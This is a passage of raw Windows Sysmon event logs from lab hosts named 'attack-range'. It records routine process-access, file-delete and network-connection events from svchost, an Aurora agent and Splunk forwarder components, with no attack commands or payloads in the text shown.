10341000x800000000000000041723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.383{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.236{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.235{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000016416Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:35.489{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66E946481540A6E3769E1B79E95C5B50,SHA256=7BA3835FC7F878CB9FBDAAE87F76864DB1B6D73964876D98899870824BD87B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016415Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:35.426{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D482FF17C20C06F075BE95C1D9830CA5,SHA256=3295229B4D632D713A959DCA3967DB162C10750CFD373C73679A3B7FE7786FB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:35.517{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E2E6-63C7-DE05-00000000AF02}4540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000041759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:35.305{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07313D64EB24589323D3E382725140C,SHA256=1162C4908FCEABCF0A455882121A42B9D8551251E52484ACB421ACC8AB65B443,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:35.305{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24F59D05623E542B5F29AA4855C37728,SHA256=EB1C6982E09CE7A847D76026974105A30E35C828F9AAB5B0C513A61F40B556B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.649{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56292-false10.0.1.12-8000- 23542300x800000000000000041761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:36.399{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F14218D11D4185A960DAE8FF1E86D055,SHA256=E97AC233CE34CD6F3F58B2CFA668FFC56D0B8C0E8ABA367826305A5E6F395684,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016417Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:36.525{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB6B62C3980E7A86F8489A0D81A200FC,SHA256=832A0DDFC12A380912C50E937044B9D35B8188396BD6E39F3E89279AE3123A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016418Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:37.627{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E63A1F35E642A02B0C656C9255D6BBBE,SHA256=C0FCE380E4F79C2219C99FB999B4A05D6DC24E7BD553A555C18EDB5B74246612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:37.495{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60933A9BB3C1FE8E087B7E342422AD6C,SHA256=11DDCC0CDAF5E6D8ECE16B06F1C105A0AE33F7C6BD57B5207023EBBC8BBEF385,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016420Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:38.713{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B57E0431207D1C77EF2A60C904220795,SHA256=75130250FAF216533ADA415113918A168B7EE4B31296DEFD5376CE4F69775927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:38.588{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01FE1FE1D9C6B556E4C3277C8C55578,SHA256=69236E82261F01EF4EB09B973C69864D484C7C6C327384ED013E7BF55AD12833,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016419Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:36.127{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50091-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016421Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:39.799{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 